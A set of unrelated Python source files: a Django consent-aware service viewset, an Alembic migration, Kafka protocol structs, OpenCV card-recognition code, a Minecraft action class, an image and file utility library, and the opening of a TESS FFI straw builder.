queryset = queryset.filter(consent_given=value)
return queryset
class ServiceViewSet(viewsets.ReadOnlyModelViewSet):
"""
List services.
retrieve:
Return a service instance.
list:
Return all services.
"""
serializer_class = ServiceSerializer
queryset = Service.objects.all()
pagination_class = DefaultPagination
filterset_class = ServiceFilter
authentication_classes = (OidcTokenAuthentication,)
def get_queryset(self):
queryset = super().get_queryset()
if not self.request:
return queryset
user = self.request.user
if user.is_authenticated and isinstance(self.request.auth, TokenAuth):
token_domains = self.request.auth.scope_domains
consent_perms = token_domains.get('consents', set())
consent_read_perm_included = any('read' in perm[0] and perm[1] is None for perm in consent_perms)
if consent_read_perm_included:
user_consents = UserConsent.objects.filter(client__service=OuterRef('pk'), user=user)
user_access_tokens = AccessToken.objects.filter(application__service=OuterRef('pk'), user=user)
queryset = queryset.annotate(
consent_given=Greatest(Exists(user_consents), Exists(user_access_tokens))
)
return queryset
|
"""empty message
Revision ID: 7e8d2278b9d4
Revises: 9e057eef6196
Create Date: 2020-08-12 23:58:03.955050
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '7e8d2278b9d4'
down_revision = '9e057eef6196'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index('idx_16698_sqlite_autoindex_film_segment_1', table_name='film_segment')
op.create_unique_constraint(None, 'film_segment', ['path'])
op.alter_column('film_segment_version', 'operation_type',
existing_type=sa.SMALLINT(),
nullable=False)
op.create_index(op.f('ix_film_segment_version_end_transaction_id'), 'film_segment_version', ['end_transaction_id'], unique=False)
op.create_index(op.f('ix_film_segment_version_operation_type'), 'film_segment_version', ['operation_type'], unique=False)
op.create_index(op.f('ix_film_segment_version_transaction_id'), 'film_segment_version', ['transaction_id'], unique=False)
op.drop_index('idx_16704_ix_film_segment_version_end_transaction_id', table_name='film_segment_version')
op.drop_index('idx_16704_ix_film_segment_version_operation_type', table_name='film_segment_version')
op.drop_index('idx_16704_ix_film_segment_version_transaction_id', table_name='film_segment_version')
op.alter_column('flasklogin-users', 'created_on',
existing_type=postgresql.TIMESTAMP(timezone=True),
nullable=False)
op.alter_column('flasklogin-users', 'email',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'first_name',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'last_name',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'password',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'write_permission',
existing_type=sa.BOOLEAN(),
nullable=False)
op.drop_index('idx_16710_sqlite_autoindex_flasklogin-users_1', table_name='flasklogin-users')
op.create_unique_constraint(None, 'flasklogin-users', ['email'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'flasklogin-users', type_='unique')
op.create_index('idx_16710_sqlite_autoindex_flasklogin-users_1', 'flasklogin-users', ['email'], unique=True)
op.alter_column('flasklogin-users', 'write_permission',
existing_type=sa.BOOLEAN(),
nullable=True)
op.alter_column('flasklogin-users', 'password',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'last_name',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'first_name',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'email',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'created_on',
existing_type=postgresql.TIMESTAMP(timezone=True),
nullable=True)
op.create_index('idx_16704_ix_film_segment_version_transaction_id', 'film_segment_version', ['transaction_id'], unique=False)
op.create_index('idx_16704_ix_film_segment_version_operation_type', 'film_segment_version', ['operation_type'], unique=False)
op.create_index('idx_16704_ix_film_segment_version_end_transaction_id', 'film_segment_version', ['end_transaction_id'], unique=False)
op.drop_index(op.f('ix_film_segment_version_transaction_id'), table_name='film_segment_version')
op.drop_index(op.f('ix_film_segment_version_operation_type'), table_name='film_segment_version')
op.drop_index(op.f('ix_film_segment_version_end_transaction_id'), table_name='film_segment_version')
op.alter_column('film_segment_version', 'operation_type',
existing_type=sa.SMALLINT(),
nullable=True)
op.drop_constraint(None, 'film_segment', type_='unique')
op.create_index('idx_16698_sqlite_autoindex_film_segment_1', 'film_segment', ['path'], unique=True)
# ### end Alembic commands ###
|
# coding: utf8
from kafkaka.bstruct import (
Struct,
ShortField, IntField, CharField, UnsignedCharField,
LongLongField, UnsignedIntField, Crc32Field,
)
class KafkaProtocol(object):
PRODUCE_KEY = 0
FETCH_KEY = 1
OFFSET_KEY = 2
METADATA_KEY = 3
OFFSET_COMMIT_KEY = 8
OFFSET_FETCH_KEY = 9
CLIENT_ID = 'kafkaka'
class HeadStruct(Struct):
api_key = ShortField()
api_version = ShortField(default=0)
correlation_id = IntField()
client_id_length = ShortField(default=len(KafkaProtocol.CLIENT_ID))
client_id = CharField(default=KafkaProtocol.CLIENT_ID, length='client_id_length')
class MetaTopicStruct(Struct):
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
class MetaStruct(Struct):
head = HeadStruct(api_key=KafkaProtocol.METADATA_KEY)
topic_length = IntField(default=0)
topics = MetaTopicStruct(repeat='topic_length')
class BrokerStruct(Struct):
node_id = IntField()
host_char_len = ShortField()
host = CharField(length='host_char_len')
port = IntField()
class PartitionStruct(Struct):
error = ShortField()
partition = IntField()
leader = IntField()
replicas_number = IntField()
replicas = IntField(repeat='replicas_number')
isr_number = IntField()
isr = IntField(repeat='isr_number')
class TopicStruct(Struct):
error = ShortField()
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
partitions_number = IntField()
partitions = PartitionStruct(repeat='partitions_number')
class MetaResponseStruct(Struct):
correlation_id = IntField()
brokers_number = IntField()
brokers = BrokerStruct(repeat='brokers_number')
topics_number = IntField()
topics = TopicStruct(repeat='topics_number')
class MessageStruct(Struct):
magic = UnsignedCharField(default=0)
attributes = UnsignedCharField(default=0)
key = IntField(default=-1)
value_length = IntField()
value = CharField(length='value_length')
class Crc32MessageStruct(Struct):
crc = Crc32Field(source='message')
message = MessageStruct()
class Crc32MessageStructWithLength(Struct):
unknown = LongLongField(default=0)
message_length = IntField(source='message')
message = Crc32MessageStruct()
class MessageSetStruct(Struct):
partition = IntField()
message_set_length = IntField(source='message_set')
message_set = Crc32MessageStructWithLength(repeat='message_set_length')
class ProducePayloadStruct(Struct):
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
topic_payloads_number = IntField()
topic_payloads = MessageSetStruct(repeat='topic_payloads_number')
class ProduceStruct(Struct):
head = HeadStruct(KafkaProtocol.PRODUCE_KEY, 0)
acks = ShortField(default=1)
timeout = IntField(default=1000)
payloads_number = IntField()
payloads = ProducePayloadStruct(repeat='payloads_number')
class ResponsePartitionStruct(Struct):
partition = IntField()
error = ShortField()
offset = LongLongField()
class ResponseTopicStruct(Struct):
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
partitions_number = IntField()
partitions = ResponsePartitionStruct(repeat='partitions_number')
class ProduceResponseStruct(Struct):
correlation_id = IntField()
topics_number = IntField()
topics = ResponseTopicStruct(repeat='topics_number')
if __name__ == "__main__":
s = HeadStruct(
KafkaProtocol.METADATA_KEY,
0,
111,
)
print s.pack2bin()
s2 = HeadStruct(
KafkaProtocol.METADATA_KEY,
0,
112,
client_id='ok'
)
print s2.pack2bin()
m1 = MetaStruct(
head=dict(correlation_id=111)
)
print m1.dump2nametuple()
print m1.pack2bin()
print m1._values
m2 = MetaStruct(
head=dict(correlation_id=222)
)
print m2.pack2bin()
binary = m1.pack2bin()
m3 = MetaStruct()
print 'unpack'
m3.unpack(binary)
print m3.pack2bin()
print m3.dump2nametuple()
msg = MessageStruct(
value='test'
)
print (msg.dump2nametuple(), msg.pack2bin())
crc_msg = Crc32MessageStruct(
message=dict(
value='test'
)
)
assert crc_msg.pack2bin() == 'Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test'
crc_msg_with_length = Crc32MessageStructWithLength(
message=dict(
message=dict(
value='test'
)
)
)
assert crc_msg_with_length.pack2bin() == '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test'
msg_set = MessageSetStruct(
partition=1,
message_set=[
dict(
message=dict(
message=dict(
value='test'
)
)
),
]
)
msg_set.pack2bin()
produce_msg = ProduceStruct(
head = dict(correlation_id=1),
payloads=[
dict(
topic_name='im-msg',
topic_payloads=[
dict(
partition=0,
message_set=[
dict(
message=dict(
message=dict(
value='test'
)
)
),
]
),
],
),
]
)
assert produce_msg.pack2bin() == '\x00\x00\x00\x00\x00\x00\x00\x01\x00\x07kafkaka\x00\x01\x00\x00\x03\xe8\x00\x00\x00\x01\x00\x06im-msg\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test'
out = ProduceStruct()
out.unpack(produce_msg.pack2bin())
print out.dump2nametuple()
assert out.dump2nametuple().payloads[0].topic_name == 'im-msg'
# test msgpack
import msgpack
p = msgpack.packb({'msg': 'hi', 'type': 4, 'dna': 470})
print [p]
print [ProduceStruct(
head = dict(correlation_id=1),
payloads=[
dict(
topic_name='im-msg',
topic_payloads=[
dict(
partition=0,
message_set=[
dict(
message=dict(
message=dict(
value=p
)
)
),
]
),
],
),
]
).pack2bin()]
|
import os, os.path
import cv2
import numpy as np
from config import cards, colors #card list, color names
#from config import not_a_card
#returns color -> green/red/black/blue
#checks color settings in config.py/colors{}
def color(img):
rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #change bgr image to rgb
red = np.array([202,16,16])
green = np.array([39,132,8])
black = np.array([0,0,0])
blue = np.array([8,8,238])
color = ""
for i in rgb:
for j in i:
if (j == green).all():
color = "Green"
return colors[color]
if (j == red).all():
color = "Red"
return colors[color]
if (j == black ).all():
color = "Black"
return colors[color]
if (j == blue).all():
color = "Blue"
return colors[color]
return "0"
#takes grayscale image and returns it black and white [(0,0,0) or (255,255,255)] pixels only
#this is very important to makes sure that close images have equal sums and let recude card list
#so it reduces numbers of operations
def black_white(pic):
for row in range(len(pic)):
for pixel in range(len(pic[row])):
if pic[row,pixel] != 0:
pic[row,pixel] = 255
return pic
#When you take a card, you need to convert it to GtayScale
#Then you need to reverse GrayScale (to make sum lower much)
#Then you change it to black and white (all non 0 pixels set to 255) and count sum
#Then you feed this function with sum_blackwhite (int) and blackwhite(cv2 numpy array - picture)
#Finally it returns value of card (defined in config.py)
def card_value(sum_blackwhite, blackwhite):
card_checked = "0"
if str(sum_blackwhite) in cards:
card_checked = cards[str(sum_blackwhite)]
#sums 6 and 9 are equal so they have the same sum. If pixel [row4:col4] is black it's a nine!
if cards[str(sum_blackwhite)] == "6":
if (blackwhite[4,4] == [0,0,0]).all():
card_checked = "9"
#same problem with ace and 3 (seems to only happen in hand)
if cards[str(sum_blackwhite)] == "3":
if (blackwhite[13,4] == [0,0,0]).all():
card_checked = "A"
return card_checked
else:
#This one can be useful
#cv2.imwrite("cards_to_add\\%i.png" % sum_blackwhite, blackwhite)
return "0"
def card_info(card):
#convert card to numpy array
card_np = np.array(card)
#cv2 works on BGR, not RGB
img_color = cv2.cvtColor(card_np, cv2.COLOR_RGB2BGR)
#GRAYSCALE for checking card value
img_gray = cv2.cvtColor(card_np, cv2.COLOR_BGR2GRAY)
#reverse grayscale for smaller sum of pixels
img_gray_reversed = cv2.bitwise_not(img_gray)
#change reversed grayscale image to black and white
#reversed to make sum smaller (0,0,0) < (255,255,255)
blackwhite = black_white(img_gray_reversed)
#sum of black white image, this is used to check value of card
sum_blackwhite = blackwhite.sum()
#Check value
value = card_value(sum_blackwhite, blackwhite)
#Check color
info = color(img_color) + value
#return color+value
return info
from screenshot import screenshot
from config import not_a_card
def grab_card_info(card_screenshots, skip=not_a_card):
cards_boards_all = ["", "", "", "", ""]
for each_card,i in zip(card_screenshots, range(5)):
current_card = card_info(each_card)
if current_card not in skip:
cards_boards_all[i] = current_card
return cards_boards_all
|
import logging
from src.services.actions.base_action import BaseAction
from src.services.actions.mixins.pause_menu_mixin_post_1_14 import PauseMenuMixinPost_1_14
logger = logging.getLogger(__name__)
class ExitWorldPost_1_14(BaseAction, PauseMenuMixinPost_1_14):
def perform(self) -> None:
logger.info("Exiting world")
self.pause_game()
self.save_and_quit_to_title()
|
import os
import re
import cv2
import ast
import sys
import json
import time
import shutil
import pickle
import argparse
import traceback
import numpy as np
from glob import glob
from tqdm import tqdm
import subprocess as sp
from os.path import join
from pathlib import Path
from os.path import exists
from os.path import dirname
from os.path import basename
from itertools import groupby
from itertools import zip_longest
from itertools import permutations
from itertools import combinations
from collections import OrderedDict
from collections import defaultdict
from datetime import datetime as dt
try:
import yaml
except:
pass
try:
from matplotlib import pyplot as plt
except:
pass
try:
import dlib
except:
pass
try:
from PIL import Image
except:
pass
try:
import pandas as pd
pd.set_option('display.max_rows', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
except:
pass
np.set_printoptions(threshold=sys.maxsize, linewidth=sys.maxsize, formatter={'float': lambda x: "{0:8.3f}".format(x)})
class DotDict(dict):
def __init__(self, datas=None):
super().__init__()
if isinstance(datas, argparse.Namespace):
datas = vars(datas)
datas = dict() if datas is None else datas
for k, v in datas.items():
self[k] = v
def __getattr__(self, key):
if key not in self:
print("56 __getattr__ pixCommon key: ", key)
raise AttributeError(key)
else:
return self[key]
def __setattr__(self, key, val):
self[key] = val
def __repr__(self):
keys = list(self.keys())
nSpace = len(max(keys, key=lambda x: len(x))) + 2
keys = sorted(keys)
data = [f'{key:{nSpace}}: {self[key]},' for key in keys]
data = '{\n%s\n}' % '\n'.join(data)
return data
def copy(self):
return DotDict(super().copy())
def toJson(self):
res = OrderedDict()
for k, v in self.items():
try:
json.dumps({k: v})
res[k] = v
except:
res[k] = str(v)
return json.dumps(res)
def toDict(self):
res = OrderedDict()
for k, v in self.items():
try:
json.dumps({k: v})
res[k] = v
except:
res[k] = str(v)
return res
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def readYaml(src, defaultDict=None):
if os.path.exists(src) or defaultDict is None:
with open(src, 'r') as book:
data = yaml.safe_load(book)
else:
data = defaultDict
return DotDict(data)
def writeYaml(yamlPath, jObjs):
with open(yamlPath, 'w') as book:
yaml.dump(yaml.safe_load(jObjs), book, default_flow_style=False, sort_keys=False)
def readPkl(pklPath, defaultData=None):
if not os.path.exists(pklPath):
print("loading pklPath: ", pklPath)
return defaultData
return pickle.load(open(pklPath, 'rb'))
def writePkl(pklPath, objs):
pickle.dump(objs, open(dirop(pklPath), 'wb'))
def dir2(var):
'''
list all the methods and attributes present in object
'''
for v in dir(var):
print(v)
print("34 dir2 common : ", );
quit()
# def checkAttr(obj, b, getAttr=False):
# a = set(vars(obj).keys())
# if getAttr:
# print(a)
# extra = a - a.intersection(b)
# if len(extra):
# raise Exception(extra)
def bboxLabel(img, txt="", loc=(30, 30), color=(255, 255, 255), thickness=3, txtSize=1, txtFont=cv2.QT_FONT_NORMAL, txtThickness=3, txtColor=None):
if len(loc) == 4:
x0, y0, w, h = loc
x0, y0, rw, rh = int(x0), int(y0), int(w), int(h)
cv2.rectangle(img, (x0, y0), (x0 + rw, y0 + rh), list(color), thickness)
else:
x0, y0, rw, rh = int(loc[0]), int(loc[1]), 0, 0
txt = str(txt)
if txt != "":
if txtColor is None:
txtColor = (0, 0, 0)
(w, h), baseLine = cv2.getTextSize(txt, txtFont, txtSize, txtThickness)
# baseLine -> to fit char like p,y in box
cv2.rectangle(img, (x0, y0 + rh), (x0 + w, y0 + rh - h - baseLine), color, -1)
cv2.putText(img, txt, (x0, y0 + rh - baseLine), txtFont, txtSize, txtColor, txtThickness, cv2.LINE_AA)
return img
def drawText(img, txt, loc, color=(255, 255, 255), txtSize=1, txtFont=cv2.FONT_HERSHEY_SIMPLEX, txtThickness=3, txtColor=None):
(w, h), baseLine = cv2.getTextSize(txt, txtFont, txtSize, txtThickness)
x0, y0 = int(loc[0]), int(loc[1])
if txtColor is None:
txtColor = (0, 0, 0)
cv2.rectangle(img, (x0, y0), (x0 + w, y0 - h - baseLine), color, -1)
cv2.putText(img, txt, (x0, y0 - baseLine), txtFont, txtSize, txtColor, txtThickness)
return img
def putSubImg(mainImg, subImg, loc, interpolation=cv2.INTER_CUBIC):
'''
place the sub image inside the genFrame image
'''
if len(loc) == 2:
x, y = int(loc[0]), int(loc[1])
h, w = subImg.shape[:2]
else:
x, y, w, h = int(loc[0]), int(loc[1]), int(loc[2]), int(loc[3])
subImg = cv2.resize(subImg, (w, h), interpolation=interpolation)
x, y, w, h = frameFit(mainImg, (x, y, w, h))
mainImg[y:y + h, x:x + w] = getSubImg(subImg, (0, 0, w, h))
return mainImg
def getSubImg(im1, bbox):
'''
crop sub image from the given input image and bbox
'''
x, y, w, h = bbox
x, y, w, h = int(x), int(y), int(w), int(h)
img = im1[y:y + h, x:x + w]
if img.shape[0] and img.shape[1]:
return img
def maskIt(roi, roiMask):
'''
apply mask on the image. It can accept both gray and colors image
'''
if len(roi.shape) == 3 and len(roiMask.shape) == 2:
roiMask = cv2.cvtColor(roiMask, cv2.COLOR_GRAY2BGR)
elif len(roi.shape) == 2 and len(roiMask.shape) == 3:
roiMask = cv2.cvtColor(roiMask, cv2.COLOR_BGR2GRAY)
return cv2.bitwise_and(roi, roiMask)
def imResize(img, sizeRC=None, scaleRC=None, interpolation=cv2.INTER_LINEAR):
if sizeRC is not None:
r, c = sizeRC[:2]
else:
try:
dr, dc = scaleRC
except:
dr, dc = scaleRC, scaleRC
r, c = img.shape[:2]
r, c = r * dr, c * dc
if interpolation == 'aa':
img = np.array(Image.fromarray(img).resize((int(c), int(r)), Image.ANTIALIAS))
else:
img = cv2.resize(img, (int(c), int(r)), interpolation=interpolation)
return img
def imHconcat(imgs, sizeRC, interpolation=cv2.INTER_LINEAR):
rh, rw = sizeRC[:2]
res = []
for queryImg in imgs:
qh, qw = queryImg.shape[:2]
queryImg = cv2.resize(queryImg, (int(rw * qw / qh), int(rh)), interpolation=interpolation)
res.append(queryImg)
return cv2.hconcat(res)
def imVconcat(imgs, sizeRC, interpolation=cv2.INTER_LINEAR):
rh, rw = sizeRC[:2]
res = []
for queryImg in imgs:
qh, qw = queryImg.shape[:2]
queryImg = cv2.resize(queryImg, (int(rw), int(rh * qh / qw)), interpolation=interpolation)
res.append(queryImg)
return cv2.vconcat(res)
class VideoWrtier:
"""mjpg xvid mp4v"""
def __init__(self, path, camFps, size=None, codec='mp4v'):
self.path = path
try:
self.fps = camFps.get(cv2.CAP_PROP_FPS)
except:
self.fps = camFps
self.__vWriter = None
self.__size = size
self.__codec = cv2.VideoWriter_fourcc(*(codec.upper()))
print("writing :", path, '@', self.fps, 'fps')
def write(self, img):
if self.__vWriter is None:
if self.__size is None:
self.__size = tuple(img.shape[:2])
self.__vWriter = cv2.VideoWriter(self.path, self.__codec, self.fps, self.__size[::-1])
if tuple(img.shape[:2]) != self.__size:
img = cv2.resize(img, self.__size)
if len(img.shape) == 2:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
self.__vWriter.write(img)
def close(self):
self.__vWriter.release()
class clk:
def __init__(self):
self.tik = dt.now()
self.__lapse = 0
def tok(self, reset=True):
lapse = dt.now() - self.tik
self.__lapse = lapse.seconds + (lapse.microseconds / 1000000)
if reset:
self.tik = dt.now()
return self
def fps(self, nFrames, roundBy=4):
lapse = nFrames / self.__lapse
# self.__lapse = 0
return round(lapse, roundBy) if roundBy else int(lapse)
def __repr__(self):
lapse = self.__lapse
# self.__lapse = 0
return str(round(lapse, 4))
def sec(self, roundBy=4):
lapse = self.__lapse
# self.__lapse = 0
return round(lapse, roundBy) if roundBy else int(lapse)
# class Clock:
# def __init__(self):
# self.__lapse = 0
# self.__tik = dt.now()
# self.__cycle = 0
#
# def tik(self):
# self.__tik = dt.now()
#
# def tok(self, reset=True):
# lapse = dt.now() - self.__tik
# lapse = lapse.seconds + (lapse.microseconds / 1000000)
# self.__lapse += lapse
# self.__cycle += 1
# return f'{round(lapse, 4)} {self.__cycle}'
#
# def __repr__(self):
# lapse = self.__lapse / self.__cycle
# return f'{round(lapse, 4)} {round(1 / lapse, 4)}'
class Wait:
def __init__(self):
self.pause = False
def __call__(self, delay=1):
if self.pause:
delay = 0
key = cv2.waitKey(delay)
if key == 32:
self.pause = True
if key == 13:
self.pause = False
return key
__wait = Wait()
def showImg(winname='output', imC=None, delay=None, windowConfig=0, nRow=None, chFirst=False):
winname = str(winname)
if imC is not None:
if type(imC) is not list:
imC = [imC]
imC = photoframe(imC, nRow=nRow, chFirst=chFirst)
cv2.namedWindow(winname, windowConfig)
cv2.imshow(winname, imC)
if delay is not None:
key = __wait(delay)
return key
return imC
def pshowImg(winname=None, imC=None, delay=0):
winname = str(winname)
if imC is not None:
if type(imC) is list:
pass
plt.imshow(imC)
if delay is not None:
if delay == 0:
plt.show()
# else:
# plt.pause(delay / 1000)
return 1
return imC
def str2path(*dirpath):
dirpath = list(map(str, dirpath))
path = join(*dirpath)
if path.startswith('home/ec2-user'):
path = join('/', path)
return path
def moveCopy(src, des, op, isFile, remove):
des = str2path(des)
if isFile and not os.path.splitext(des)[-1]:
raise Exception(f'''Fail des: {des}
should be file''')
if not remove and exists(des):
raise Exception(f'''Fail des: {des}
already exists delete it before operation''')
if isFile:
if remove and exists(des):
os.remove(des)
mkpath = dirname(des)
if not exists(mkpath):
os.makedirs(mkpath)
else:
if remove and exists(des):
shutil.rmtree(des, ignore_errors=True)
return op(src, des)
def dirop(*dirpath, **kw):
mkdir, remove, mode = kw.get('mkdir', True), kw.get('remove'), kw.get('mode', 0o777)
copyTo, moveTo = kw.get('copyTo'), kw.get('moveTo')
path = str2path(*dirpath)
isFile = os.path.splitext(path)[-1]
if copyTo or moveTo:
if not exists(path):
raise Exception(f'''Fail src: {path}
not found''')
elif remove is True and exists(path):
if isFile:
os.remove(path)
else:
shutil.rmtree(path, ignore_errors=True)
mkpath = dirname(path) if isFile else path
if mkdir and not exists(mkpath) and mkpath:
os.makedirs(mkpath)
if copyTo:
copy = shutil.copy if isFile else shutil.copytree
path = moveCopy(path, copyTo, copy, isFile, remove=remove)
elif moveTo:
path = moveCopy(path, moveTo, shutil.move, isFile, remove=remove)
return path
def downloadDB(link, des, remove=False):
dirop(des)
os.system(f'cd {des};wget -nd -c "{link}"')
unzipIt(join(des, basename(link)), des, remove=remove)
def zipIt(src, desZip, remove=False):
if not exists(src):
raise Exception(f'''Fail src: {src} \n\tnot found''')
if exists(desZip):
if remove:
os.remove(desZip)
else:
raise Exception(f'''Fail des: {desZip} \n\talready exists delete it before operation''')
desZip, zipExt = os.path.splitext(desZip)
if os.path.isfile(src):
tempDir = join(dirname(src), getTimeStamp())
if os.path.exists(tempDir):
raise Exception(f'''Fail tempDir: {tempDir} \n\talready exists delete it before operation''')
os.makedirs(tempDir)
shutil.copy(src, tempDir)
desZip = shutil.make_archive(desZip, zipExt[1:], tempDir)
shutil.rmtree(tempDir, ignore_errors=True)
else:
desZip = shutil.make_archive(desZip, zipExt[1:], src)
return desZip
def unzipIt(src, desDir, remove=False):
if not exists(src):
raise Exception(f'''Fail src: {src} \n\tnot found''')
if os.path.splitext(desDir)[-1]:
raise Exception(f'''Fail desDir: {desDir} \n\tshould be folder''')
tempDir = join(dirname(desDir), getTimeStamp())
shutil.unpack_archive(src, tempDir)
if not exists(desDir):
os.makedirs(desDir)
for mvSrc in os.listdir(tempDir):
mvSrc = join(tempDir, mvSrc)
mvDes = join(desDir, basename(mvSrc))
if remove is True and exists(mvDes):
if os.path.isfile(mvDes):
os.remove(mvDes)
else:
shutil.rmtree(mvDes, ignore_errors=True)
try:
shutil.move(mvSrc, desDir)
except Exception as exp:
shutil.rmtree(tempDir, ignore_errors=True)
raise Exception(exp)
shutil.rmtree(tempDir, ignore_errors=True)
return desDir
# def float2img(img, pixmin=0, pixmax=255, dtype=0):
# '''
# convert oldFeature to (0 to 255) range
# '''
# return cv2.normalize(img, None, pixmin, pixmax, 32, dtype)
def float2img(img, min=None, max=None):
min = img.min() if min is None else min
max = img.max() if max is None else max
img = img.astype('f4')
img -= min
img /= max
return (255 * img).astype('u1')
def photoframe(imgs, rcsize=None, nRow=None, resize_method=cv2.INTER_LINEAR, fit=False, asgray=False, chFirst=False):
'''
# This method pack the array of images in a visually pleasing manner.
# If the nCol is not specified then the nRow and nCol are equally divided
# This method can automatically pack images of different size. Default stitch size is 128,128
# when fit is True final photo frame size will be rcsize
# is False individual image size will be rcsize
# Examples
# --------
video = Player(GetFeed(join(dbpath, 'videos', r'remove_rain.mp4')), custom_fn=None)
for fnos, imgs in video.chunk(4):
i1 = photoframe(imgs, nCol=None)
i2 = photoframe(imgs, nCol=4)
i3 = photoframe(imgs, nCol=4, rcsize=(200,300),nimgs=7)
i4 = photoframe(imgs, nCol=3, nimgs=7)
i5 = photoframe(imgs, nCol=4, rcsize=imgs[0].shape)
i6 = photoframe(imgs, nCol=6, rcsize=imgs[0].shape, fit=True)
i7 = photoframe(imgs, nCol=4, rcsize=imgs[0].shape, fit=True, asgray=True)
for i, oldFeature in enumerate([i1, i2, i3, i4, i5, i6, i7], 1):
print(i, oldFeature.shape)
win('i%s' % i, )(oldFeature)
win('totoal')(photoframe([i1, i2, i3, i4, i5, i6, i7]))
if win().__wait(waittime) == 'esc':
break
'''
if len(imgs):
if chFirst:
imgs = np.array([np.transpose(img, [1, 2, 0]) for img in imgs])
if rcsize is None:
rcsize = imgs[0].shape
imrow, imcol = rcsize[:2] # fetch first two vals
nimgs = len(imgs)
nRow = int(np.ceil(nimgs ** .5)) if nRow is None else int(nRow)
nCol = nimgs / nRow
nCol = int(np.ceil(nCol + 1)) if (nRow * nCol) - nimgs else int(np.ceil(nCol))
if fit:
imrow /= nRow
imcol /= nCol
imrow, imcol = int(imrow), int(imcol)
resshape = (imrow, imcol) if asgray else (imrow, imcol, 3)
imgs = zip_longest(list(range(nRow * nCol)), imgs, fillvalue=np.zeros(resshape, imgs[0].dtype))
resimg = []
for i, imggroup in groupby(imgs, lambda k: k[0] // nCol):
rowimg = []
for i, img in imggroup:
if img.dtype != np.uint8:
img = float2img(img)
if asgray:
if len(img.shape) == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
elif len(img.shape) == 2:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
elif img.shape[-1] == 1:
img = img.reshape(*img.shape[:2])
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
if tuple(img.shape) != resshape:
img = cv2.resize(img, (imcol, imrow), interpolation=resize_method)
rowimg.append(img)
resimg.append(cv2.hconcat(rowimg))
return cv2.vconcat(resimg)
def getTimeStamp():
return dt.now().strftime("%d%b%H%M%S_%f")
def replaces(path, *words):
path = str(path)
for word in words:
path = path.replace(*word)
return path
|
# -*- coding: utf-8 -*-
# Copyright 2017-2018 Orbital Insight Inc., all rights reserved.
# Contains confidential and trade secret information.
# Government Users: Commercial Computer Software - Use governed by
# terms of Orbital Insight commercial license agreement.
"""
Created on Fri Aug 16 19:25:37 2019
TODO
x Save metadata to output directory
x Function to read metadata
x Load straws should figure out if its searching on s3
x Straw names should include sector
x Docstrings
x Investigate async to speed writing the straws
x Add more info to metadata file
o Straw maker may not deal with edges of the ccd correctly
o Is npy the best format for writing straws?
x Do I need to save a time file?
@author: fergal
Concepts
-----------
FFI
Full Frame Image. A single image from a single camera/ccd taken by
TESS. Typically, we only want a small postage stamp from each FFI,
but we want that postage stamp for many FFIs
Datacube
A 3d numpy array, where each row is an image.
Straw
A datacube consisting of a small postage stamp image from each an every
FFI in a sector.
Camera, CCD, col, row
This 4-tuple uniquely identifies a pixel on the TESS focal plane.
This module contains a class to collect all the imagery from a set of FFIs,
and create straws that tile the entire viewing area, then another class
to construct a datacube from those tiles.
This serves the use case where you want to get all the imagery across all
FFIs for a single star. By dividing up the data this way we can minimise
the time spent on reading files, and downloading data. As such it is an
excellent approach for accessing data on single stars from s3 using an
AWS Lambda.
"""
from __future__ import print_function
from __future__ import division
from pdb import set_trace as debug
import numpy as np
import os
import astropy.io.fits as pyfits
from glob import glob
import collections
import datetime
import inspect
import json
from common import METADATA_FILE
from common import makeStrawName
class MakeTessStraw(object):
def __init__(self, ffiPath, outPath, sector, camera, ccd):
"""
Inputs
----------
ffiPath
(str) Path to FFI files on local disk. This path can contain
FFIs from mulitple ccds or cameras, but can only contain FFIs
from a single sector.
outPath
(str) Location on local disk to store straws
sector
(int) sector number to process
"""
#The order these variables are defined should (not not definitely)
#be reproduced in the json stored metadata. Hence a couple of
#items are defined before their values are known.
self.outPath = outPath
self.ffiPath = ffiPath
self.sector = sector
self.camera = camera
self.ccd = ccd
self.nColsRows = None #See note above
self.dataVersion = None
self.strawSize = 50
self.midtimes_tbjd = None #Will be filled in later
self.qualityFlags = None
#The sector version string is part of the FFI filename
sectorVersion= {1:120, 3:123}
try:
self.dataVersion = sectorVersion[sector]
except IndexError:
raise IndexError("sectorVersion string not hardcoded for this sector yet")
#These must be set in this order
self.datestampList = self.loadDatestamps()
self.nColsRows = self.getFfiShape()
self.do(camera, ccd)
def loadDatestamps(self):
"""Load a list of datestamps from all the FFIs in `ffiPath`
Look in the directory `self.ffiPath`, find all the FFI files,
and extract their datestamps. It would be nice is those were also
